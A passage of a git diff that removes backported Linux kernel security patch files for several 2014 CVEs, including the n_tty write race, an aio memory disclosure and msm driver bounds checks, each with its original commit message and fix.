-Change-Id: I4ebef6a390df3487903b166b837e34c653e01cb2
-Signed-off-by: Amit Pundir <amit.pundir@linaro.org>
-Bug: 29119002
----
- net/unix/af_unix.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 5e6323792a5e0..204bee47aa10c 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1701,7 +1701,12 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 			goto out_unlock;
- 	}
- 
--	if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) {
-+	/* other == sk && unix_peer(other) != sk if
-+	 * - unix_peer(sk) == NULL, destination address bound to sk
-+	 * - unix_peer(sk) == sk by time of get but disconnected before lock
-+	 */
-+	if (other != sk &&
-+	    unlikely(unix_peer(other) != sk && unix_recvq_full(other))) {
- 		if (timeo) {
- 			timeo = unix_wait_for_peer(other, timeo);
- 
diff --git a/Patches/Linux_CVEs/CVE-2014-0196/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2014-0196/3.2/0002.patch
deleted file mode 100644
index 21d68bf3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0196/3.2/0002.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From 1e5099713cefc67aa562f6d8fe43444f41baf52d Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Sat, 3 May 2014 14:04:59 +0200
-Subject: n_tty: Fix n_tty_write crash when echoing in raw mode
-
-commit 4291086b1f081b869c6d79e5b7441633dc3ace00 upstream.
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST.  And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
-  int space = __tty_buffer_request_room(port, goal, flags);
-  struct tty_buffer *tb = port->buf.tail;
-  ...
-  memcpy(char_buf_ptr(tb, tb->used), chars, space);
-  ...
-  tb->used += space;
-
-so the race of the two can result in something like this:
-              A                                B
-__tty_buffer_request_room
-                                  __tty_buffer_request_room
-memcpy(buf(tb->used), ...)
-tb->used += space;
-                                  memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes.  This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-References: CVE-2014-0196
-Reported-and-tested-by: Jiri Slaby <jslaby@suse.cz>
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Jiri Slaby <jslaby@suse.cz>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Alan Cox <alan@lxorguk.ukuu.org.uk>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-[bwh: Backported to 3.2: output_lock is a member of struct tty_struct]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- drivers/tty/n_tty.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 0f8a785..bac83d8 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -1997,7 +1997,9 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- 				tty->ops->flush_chars(tty);
- 		} else {
- 			while (nr > 0) {
-+				mutex_lock(&tty->output_lock);
- 				c = tty->ops->write(tty, b, nr);
-+				mutex_unlock(&tty->output_lock);
- 				if (c < 0) {
- 					retval = c;
- 					goto break_out;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0196/3.4/0003.patch b/Patches/Linux_CVEs/CVE-2014-0196/3.4/0003.patch
deleted file mode 100644
index b7c78569..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0196/3.4/0003.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 9aabfc9e7775abbbcf534cdecccc4f12ee423b27 Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Tue, 13 May 2014 14:36:46 -0700
-Subject: n_tty: Fix n_tty_write crash when echoing in raw mode
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST. And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
-  int space = __tty_buffer_request_room(port, goal, flags);
-  struct tty_buffer *tb = port->buf.tail;
-  ...
-  memcpy(char_buf_ptr(tb, tb->used), chars, space);
-  ...
-  tb->used += space;
-
-so the race of the two can result in something like this:
-          A                             B
-   __tty_buffer_request_room
-                                  __tty_buffer_request_room
-   memcpy(buf(tb->used), ...)
-   tb->used += space;
-                                 memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes. This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Jiri Slaby <jslaby@suse.cz>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Change-Id: I9e235db6ec2bb950f26bd8a23f6145dab5dc0a15
-Git-commit: 4291086b1f081b869c6d79e5b7441633dc3ace00
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-Signed-off-by: Avijit Kanti Das <avijitnsec@codeaurora.org>
-[rsiddoji@codeaurora.org: resolve trivial merge conflicts]
-Signed-off-by: Ravi Kumar S <rsiddoji@codeaurora.org>
----
- drivers/tty/n_tty.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 8eb5573..54c46c8 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -1998,8 +1998,11 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- 			if (tty->ops->flush_chars)
- 				tty->ops->flush_chars(tty);
- 		} else {
-+
- 			while (nr > 0) {
-+				mutex_lock(&tty->output_lock);
- 				c = tty->ops->write(tty, b, nr);
-+				mutex_unlock(&tty->output_lock);
- 				if (c < 0) {
- 					retval = c;
- 					goto break_out;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0196/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0196/ANY/0001.patch
deleted file mode 100644
index 2b19f407..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0196/ANY/0001.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From 4291086b1f081b869c6d79e5b7441633dc3ace00 Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Sat, 3 May 2014 14:04:59 +0200
-Subject: [PATCH] n_tty: Fix n_tty_write crash when echoing in raw mode
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST.  And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
-  int space = __tty_buffer_request_room(port, goal, flags);
-  struct tty_buffer *tb = port->buf.tail;
-  ...
-  memcpy(char_buf_ptr(tb, tb->used), chars, space);
-  ...
-  tb->used += space;
-
-so the race of the two can result in something like this:
-              A                                B
-__tty_buffer_request_room
-                                  __tty_buffer_request_room
-memcpy(buf(tb->used), ...)
-tb->used += space;
-                                  memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes.  This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-References: CVE-2014-0196
-Reported-and-tested-by: Jiri Slaby <jslaby@suse.cz>
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Jiri Slaby <jslaby@suse.cz>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Alan Cox <alan@lxorguk.ukuu.org.uk>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/tty/n_tty.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 41fe8a047d373..fe9d129c87351 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -2353,8 +2353,12 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- 			if (tty->ops->flush_chars)
- 				tty->ops->flush_chars(tty);
- 		} else {
-+			struct n_tty_data *ldata = tty->disc_data;
-+
- 			while (nr > 0) {
-+				mutex_lock(&ldata->output_lock);
- 				c = tty->ops->write(tty, b, nr);
-+				mutex_unlock(&ldata->output_lock);
- 				if (c < 0) {
- 					retval = c;
- 					goto break_out;
diff --git a/Patches/Linux_CVEs/CVE-2014-0206/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0206/ANY/0001.patch
deleted file mode 100644
index 7c80276a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0206/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From d36db46c2cba973557eb6138d22210c4e0cf17d6 Mon Sep 17 00:00:00 2001
-From: Benjamin LaHaise <bcrl@kvack.org>
-Date: Tue, 24 Jun 2014 13:32:51 -0400
-Subject: aio: fix kernel memory disclosure in io_getevents() introduced in
- v3.10
-
-commit edfbbf388f293d70bf4b7c0bc38774d05e6f711a upstream.
-
-A kernel memory disclosure was introduced in aio_read_events_ring() in v3.10
-by commit a31ad380bed817aa25f8830ad23e1a0480fef797.  The changes made to
-aio_read_events_ring() failed to correctly limit the index into
-ctx->ring_pages[], allowing an attacked to cause the subsequent kmap() of
-an arbitrary page with a copy_to_user() to copy the contents into userspace.
-This vulnerability has been assigned CVE-2014-0206.  Thanks to Mateusz and
-Petr for disclosing this issue.
-
-This patch applies to v3.12+.  A separate backport is needed for 3.10/3.11.
-
-[jmoyer@redhat.com: backported to 3.10]
-Signed-off-by: Benjamin LaHaise <bcrl@kvack.org>
-Signed-off-by: Jeff Moyer <jmoyer@redhat.com>
-Cc: Mateusz Guzik <mguzik@redhat.com>
-Cc: Petr Matousek <pmatouse@redhat.com>
-Cc: Kent Overstreet <kmo@daterainc.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- fs/aio.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 8d2c997..ded94c4 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -717,6 +717,8 @@ static long aio_read_events_ring(struct kioctx *ctx,
- 	if (head == ctx->tail)
- 		goto out;
- 
-+	head %= ctx->nr_events;
-+
- 	while (ret < nr) {
- 		long avail;
- 		struct io_event *ev;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0972/ANY/0001.patch
deleted file mode 100644
index 60c69649..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0001.patch
+++ /dev/null
@@ -1,181 +0,0 @@
-From 7613c9d520ee4d227e635f6db0270d4cf26102bc Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Mon, 21 Apr 2014 15:04:54 -0600
-Subject: msm: kgsl: Protect CP_STATE_DEBUG_INDEX
-
-Put CP_STATE_DEBUG_INDEX and CP_STATE_DEBUG_DATA under protection
-to keep it from being written from an IB1. Doing so however opens
-up a subtle "feature" in the microcode: memory read opcodes turn off
-protected mode in the microcode to do the read and then turns it
-back on regardless of the initial state. This is a problem if the
-memory read happens while protected mode is turned off and then we
-try to access a protected register which then complains and goes boom.
-
-To account for this irregularity explicitly turn back off protected
-mode in all the places where we know this will be a problem.
-
-Change-Id: Ic0dedbad1397ca9b80132241ac006560a615e042
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
----
- drivers/gpu/msm/adreno.c      | 24 +++++++++++++-----------
- drivers/gpu/msm/adreno.h      | 10 ++++++++++
- drivers/gpu/msm/adreno_a3xx.c |  1 +
- drivers/gpu/msm/kgsl_iommu.c  | 16 ++++++++++++++++
- 4 files changed, 40 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/gpu/msm/adreno.c b/drivers/gpu/msm/adreno.c
-index 4b21218..9bd07c6 100644
---- a/drivers/gpu/msm/adreno.c
-+++ b/drivers/gpu/msm/adreno.c
-@@ -1150,9 +1150,7 @@ static int adreno_iommu_setstate(struct kgsl_device *device,
- 					uint32_t flags)
- {
- 	phys_addr_t pt_val;
--	unsigned int link[230];
--	unsigned int *cmds = &link[0];
--	int sizedwords = 0;
-+	unsigned int *link = NULL, *cmds;
- 	struct adreno_device *adreno_dev = ADRENO_DEVICE(device);
- 	int num_iommu_units;
- 	struct kgsl_context *context;
-@@ -1170,6 +1168,14 @@ static int adreno_iommu_setstate(struct kgsl_device *device,
- 	if (context)
- 		adreno_ctx = ADRENO_CONTEXT(context);
- 
-+	link = kmalloc(PAGE_SIZE, GFP_KERNEL);
-+	if (link == NULL) {
-+		result = -ENOMEM;
-+		goto done;
-+	}
-+
-+	cmds = link;
-+
- 	result = kgsl_mmu_enable_clk(&device->mmu, KGSL_IOMMU_CONTEXT_USER);
- 
- 	if (result)
-@@ -1192,17 +1198,11 @@ static int adreno_iommu_setstate(struct kgsl_device *device,
- 		cmds += _adreno_iommu_setstate_v1(device, cmds, pt_val,
- 						num_iommu_units, flags);
- 
--	sizedwords += (cmds - &link[0]);
--	if (sizedwords == 0) {
--		KGSL_DRV_ERR(device, "no commands generated\n");
--		BUG();
--	}
- 	/* invalidate all base pointers */
- 	*cmds++ = cp_type3_packet(CP_INVALIDATE_STATE, 1);
- 	*cmds++ = 0x7fff;
--	sizedwords += 2;
- 
--	if (sizedwords > (ARRAY_SIZE(link))) {
-+	if ((unsigned int) (cmds - link) > (PAGE_SIZE / sizeof(unsigned int))) {
- 		KGSL_DRV_ERR(device, "Temp command buffer overflow\n");
- 		BUG();
- 	}
-@@ -1211,7 +1211,8 @@ static int adreno_iommu_setstate(struct kgsl_device *device,
- 	 * use the global timestamp for iommu clock disablement
- 	 */
- 	result = adreno_ringbuffer_issuecmds(device, adreno_ctx,
--			KGSL_CMD_FLAGS_PMODE, &link[0], sizedwords);
-+			KGSL_CMD_FLAGS_PMODE, link,
-+			(unsigned int)(cmds - link));
- 
- 	/*
- 	 * On error disable the IOMMU clock right away otherwise turn it off
-@@ -1225,6 +1226,7 @@ static int adreno_iommu_setstate(struct kgsl_device *device,
- 						KGSL_IOMMU_CONTEXT_USER);
- 
- done:
-+	kfree(link);
- 	kgsl_context_put(context);
- 	return result;
- }
-diff --git a/drivers/gpu/msm/adreno.h b/drivers/gpu/msm/adreno.h
-index 8e162ca..0b793fa 100644
---- a/drivers/gpu/msm/adreno.h
-+++ b/drivers/gpu/msm/adreno.h
-@@ -805,6 +805,11 @@ static inline int adreno_add_read_cmds(struct kgsl_device *device,
- 	*cmds++ = val;
- 	*cmds++ = 0xFFFFFFFF;
- 	*cmds++ = 0xFFFFFFFF;
-+
-+	/* WAIT_REG_MEM turns back on protected mode - push it off */
-+	*cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1);
-+	*cmds++ = 0;
-+
- 	cmds += __adreno_add_idle_indirect_cmds(cmds, nop_gpuaddr);
- 	return cmds - start;
- }
-@@ -850,6 +855,11 @@ static inline int adreno_wait_reg_mem(unsigned int *cmds, unsigned int addr,
- 	*cmds++ = val; /* ref val */
- 	*cmds++ = mask;
- 	*cmds++ = interval;
-+
-+	/* WAIT_REG_MEM turns back on protected mode - push it off */
-+	*cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1);
-+	*cmds++ = 0;
-+
- 	return cmds - start;
- }
- /*
-diff --git a/drivers/gpu/msm/adreno_a3xx.c b/drivers/gpu/msm/adreno_a3xx.c
-index 70ba50e..873a5c9 100644
---- a/drivers/gpu/msm/adreno_a3xx.c
-+++ b/drivers/gpu/msm/adreno_a3xx.c
-@@ -2038,6 +2038,7 @@ static void a3xx_protect_init(struct kgsl_device *device)
- 
- 	/* CP registers */
- 	adreno_set_protected_registers(device, &index, 0x1C0, 5);
-+	adreno_set_protected_registers(device, &index, 0x1EC, 1);
- 	adreno_set_protected_registers(device, &index, 0x1F6, 1);
- 	adreno_set_protected_registers(device, &index, 0x1F8, 2);
- 	adreno_set_protected_registers(device, &index, 0x45E, 2);
-diff --git a/drivers/gpu/msm/kgsl_iommu.c b/drivers/gpu/msm/kgsl_iommu.c
-index dba23b0..68b3420 100644
---- a/drivers/gpu/msm/kgsl_iommu.c
-+++ b/drivers/gpu/msm/kgsl_iommu.c
-@@ -1036,6 +1036,10 @@ static unsigned int kgsl_iommu_sync_lock(struct kgsl_mmu *mmu,
- 	*cmds++ = 0x1;
- 	*cmds++ = 0x1;
- 
-+	/* WAIT_REG_MEM turns back on protected mode - push it off */
-+	*cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1);
-+	*cmds++ = 0;
-+
- 	*cmds++ = cp_type3_packet(CP_MEM_WRITE, 2);
- 	*cmds++ = lock_vars->turn;
- 	*cmds++ = 0;
-@@ -1050,11 +1054,19 @@ static unsigned int kgsl_iommu_sync_lock(struct kgsl_mmu *mmu,
- 	*cmds++ = 0x1;
- 	*cmds++ = 0x1;
- 
-+	/* WAIT_REG_MEM turns back on protected mode - push it off */
-+	*cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1);
-+	*cmds++ = 0;
-+
- 	*cmds++ = cp_type3_packet(CP_TEST_TWO_MEMS, 3);
- 	*cmds++ = lock_vars->flag[PROC_APPS];
- 	*cmds++ = lock_vars->turn;
- 	*cmds++ = 0;
- 
-+	/* TEST_TWO_MEMS turns back on protected mode - push it off */
-+	*cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1);
-+	*cmds++ = 0;
-+
- 	cmds += adreno_add_idle_cmds(adreno_dev, cmds);
- 
- 	return cmds - start;
-@@ -1092,6 +1104,10 @@ static unsigned int kgsl_iommu_sync_unlock(struct kgsl_mmu *mmu,
- 	*cmds++ = 0x1;
- 	*cmds++ = 0x1;
- 
-+	/* WAIT_REG_MEM turns back on protected mode - push it off */
-+	*cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1);
-+	*cmds++ = 0;
-+
- 	cmds += adreno_add_idle_cmds(adreno_dev, cmds);
- 
- 	return cmds - start;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-0972/ANY/0002.patch
deleted file mode 100644
index 2e743900..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0002.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From d7d07936a166e7421a6308eec443b707a9678580 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Thu, 17 Apr 2014 10:05:21 -0600
-Subject: msm: kgsl: Mark the IOMMU setstate memory as read only
-
-Mark the IOMMU setstate memory as read only in the pagetable.
-
-Change-Id: Ic0dedbadb19e499c749cd744c3e89be3bcb4c2a2
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
----
- drivers/gpu/msm/kgsl_mmu.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/gpu/msm/kgsl_mmu.c b/drivers/gpu/msm/kgsl_mmu.c
-index 95aac09..eb6d76f 100644
---- a/drivers/gpu/msm/kgsl_mmu.c
-+++ b/drivers/gpu/msm/kgsl_mmu.c
-@@ -377,6 +377,10 @@ int kgsl_mmu_init(struct kgsl_device *device)
- 					PAGE_SIZE);
- 	if (status)
- 		return status;
-+
-+	/* Mark the setstate memory as read only */
-+	mmu->setstate_memory.flags |= KGSL_MEMFLAGS_GPUREADONLY;
-+
- 	kgsl_sharedmem_set(device, &mmu->setstate_memory, 0, 0,
- 				mmu->setstate_memory.size);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0975/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0975/ANY/0001.patch
deleted file mode 100644
index ef25a282..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0975/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 832666bda9606623c3cff5b14873553f82ec1281 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee <sumam@codeaurora.org>
-Date: Tue, 9 Dec 2014 13:25:36 +0530
-Subject: msm: camera: add check for csid_cid to prevent of overwrite memory
-
-add sanity check for csid cid to ensute that we never read or write
-outside csid_dev->mem buffer
-
-Change-Id: Ic8f0d689fa176720ae3a3316f2ad27556ae7bde5
-Signed-off-by: Suman Mukherjee <sumam@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index 3596a12..53a5ed3 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -50,6 +50,13 @@ static int msm_csid_cid_lut(
- 		return -EINVAL;
- 	}
- 	for (i = 0; i < csid_lut_params->num_cid && i < 16; i++) {
-+		if (csid_lut_params->vc_cfg[i]->cid >=
-+			csid_lut_params->num_cid ||
-+			csid_lut_params->vc_cfg[i]->cid < 0) {
-+				pr_err("%s: cid outside range %d\n",
-+					__func__, csid_lut_params->vc_cfg[i]->cid);
-+				return -EINVAL;
-+		}
- 		CDBG("%s lut params num_cid = %d, cid = %d, dt = %x, df = %d\n",
- 			__func__,
- 			csid_lut_params->num_cid,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0976/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0976/ANY/0001.patch
deleted file mode 100644
index 9136c47e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0976/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From ee37138b8ceee6035c93756043eaac7eaa1c0948 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee <sumam@codeaurora.org>
-Date: Wed, 17 Dec 2014 10:00:49 +0530
-Subject: msm: camera: ispif: Validate vfe_intf parameter
-
-Validate vfe_intf parameter to avoid invalid register access.
-
-Change-Id: Ie0b57071cc5fca1c48d3a5e2e7819f9af9ff544c
-Signed-off-by: Suman Mukherjee <sumam@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 8f99ff6..d044c1d 100755
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -60,8 +60,8 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
- 	uint8_t intf_type)
- {
--	return (csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ?
--		false : true;
-+        return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
-+                (intf_type >= VFE_MAX)) ? false : true;
- }
- 
- static struct msm_cam_clk_info ispif_8626_reset_clk_info[] = {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-1739/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-1739/ANY/0001.patch
deleted file mode 100644
index 58b14f95..00000000
--- a/Patches/Linux_CVEs/CVE-2014-1739/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From e6a623460e5fc960ac3ee9f946d3106233fd28d8 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Salva=20Peir=C3=B3?= <speiro@ai2.upv.es>
-Date: Wed, 30 Apr 2014 19:48:02 +0200
-Subject: [media] media-device: fix infoleak in ioctl media_enum_entities()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-This fixes CVE-2014-1739.
-
-Signed-off-by: Salva Peiró <speiro@ai2.upv.es>
-Acked-by: Laurent Pinchart <laurent.pinchart@ideasonboard.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Mauro Carvalho Chehab <m.chehab@samsung.com>
----
- drivers/media/media-device.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/drivers/media/media-device.c b/drivers/media/media-device.c
-index d5a7a13..703560f 100644
---- a/drivers/media/media-device.c
-+++ b/drivers/media/media-device.c
-@@ -93,6 +93,7 @@ static long media_device_enum_entities(struct media_device *mdev,
- 	struct media_entity *ent;
- 	struct media_entity_desc u_ent;
- 
-+	memset(&u_ent, 0, sizeof(u_ent));
- 	if (copy_from_user(&u_ent.id, &uent->id, sizeof(u_ent.id)))
- 		return -EFAULT;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-2523/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-2523/3.2/0001.patch
deleted file mode 100644
index 9e63ea71..00000000
--- a/Patches/Linux_CVEs/CVE-2014-2523/3.2/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 5b866eaa34e4ddc312c927030fde5f6a6184ddc5 Mon Sep 17 00:00:00 2001
-From: Daniel Borkmann <dborkman@redhat.com>
-Date: Mon, 6 Jan 2014 00:57:54 +0100
-Subject: netfilter: nf_conntrack_dccp: fix skb_header_pointer API usages
-
-commit b22f5126a24b3b2f15448c3f2a254fc10cbc2b92 upstream.
-
-Some occurences in the netfilter tree use skb_header_pointer() in
-the following way ...
-
-  struct dccp_hdr _dh, *dh;
-  ...
-  skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-
-... where dh itself is a pointer that is being passed as the copy
-buffer. Instead, we need to use &_dh as the forth argument so that
-we're copying the data into an actual buffer that sits on the stack.
-
-Currently, we probably could overwrite memory on the stack (e.g.
-with a possibly mal-formed DCCP packet), but unintentionally, as
-we only want the buffer to be placed into _dh variable.
-
-Fixes: 2bc780499aa3 ("[NETFILTER]: nf_conntrack: add DCCP protocol support")
-Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/netfilter/nf_conntrack_proto_dccp.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/net/netfilter/nf_conntrack_proto_dccp.c b/net/netfilter/nf_conntrack_proto_dccp.c
-index 2e664a6..8aa94ee 100644
---- a/net/netfilter/nf_conntrack_proto_dccp.c
-+++ b/net/netfilter/nf_conntrack_proto_dccp.c
-@@ -431,7 +431,7 @@ static bool dccp_new(struct nf_conn *ct, const struct sk_buff *skb,
- 	const char *msg;
- 	u_int8_t state;
- 
--	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-+	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
- 	BUG_ON(dh == NULL);
- 
- 	state = dccp_state_table[CT_DCCP_ROLE_CLIENT][dh->dccph_type][CT_DCCP_NONE];
-@@ -483,7 +483,7 @@ static int dccp_packet(struct nf_conn *ct, const struct sk_buff *skb,
